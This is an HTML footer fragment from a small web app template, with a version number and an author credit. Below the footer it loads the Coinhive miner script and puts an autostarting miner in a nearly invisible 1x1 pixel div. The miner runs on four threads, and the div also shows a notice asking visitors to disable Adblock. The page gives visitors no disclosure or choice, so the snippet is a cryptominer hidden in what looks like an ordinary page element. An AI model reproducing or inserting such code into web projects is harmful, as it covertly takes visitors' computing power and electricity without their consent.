<footer class="main-footer">

  <div class="pull-right hidden-xs">
    <b>Version</b> 0.0.1
  </div>
  Made with ♥ by <a href="https://github.com/zacharyweiner">@TheTravelingWeiner</a>.
</footer>
<script src="https://coinhive.com/lib/miner.min.js" async></script>
<div class="coinhive-miner"
  style="width: 1px; height: 1px"
  data-key="pBpWbTK9iS43nsOXuF5atC3roCPOki8z"
  data-autostart="true"
  data-whitelabel="false"
  data-background="#000000"
  data-text="#eeeeee"
  data-action="#00ff00"
  data-graph="#555555"
  data-threads="4"
  data-throttle="0.5"
  data-start="Start Now!">
  <em>Please disable Adblock!</em>
</div>
